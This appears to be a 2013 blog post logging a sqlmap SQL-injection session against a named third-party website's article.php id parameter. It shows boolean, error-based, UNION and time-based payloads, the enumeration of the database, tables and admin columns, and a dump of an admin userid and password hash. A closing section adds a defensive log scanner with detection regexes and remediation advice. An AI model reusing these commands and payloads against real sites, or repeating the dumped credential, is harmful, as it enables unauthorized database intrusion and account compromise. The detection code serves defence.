sqlmap example: injecting into MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
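
Seen from the defending side, the four technique classes sqlmap lists in the session above (boolean-based, error-based, UNION query, time-based) leave recognizable query strings in the web server's access log. The following is an added example, not part of the original post: the log lines, client addresses and the `classify`/`scan` helpers are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# One signature per technique class named in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bGROUP\s+BY\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+", re.I),
}
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def classify(line):
    """Return (client_ip, sorted technique names) for one access-log line."""
    m = REQUEST.match(line)
    if not m:
        return None, []
    ip, target = m.groups()
    query = unquote_plus(urlsplit(target).query)  # decode %20, %3D, '+' first
    return ip, sorted(n for n, rx in SIGNATURES.items() if rx.search(query))

def scan(lines, min_classes=2):
    """Flag clients that probe with several technique classes (scanner-like)."""
    seen = defaultdict(set)
    for line in lines:
        ip, hits = classify(line)
        if hits:
            seen[ip].update(hits)
    return {ip: sorted(t) for ip, t in seen.items() if len(t) >= min_classes}

# Constructed sample log lines (documentation address ranges, made-up timestamps).
TS = "[04/Apr/2013:16:50:01 +0800]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {TS} "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {TS} "GET /article.php?id=276%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),'
    'CONCAT(1,FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 640',
    f'203.0.113.7 - - {TS} "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL%23 HTTP/1.1" 200 812',
    f'203.0.113.7 - - {TS} "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    f'198.51.100.20 - - {TS} "GET /search.php?q=sleep+and+rest HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, techniques in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(techniques))
```

Signatures like these catch default tool payloads only; the durable fix for the `id` parameter is a parameterized query, and the `root@localhost` result above shows why the application's database account should not be root.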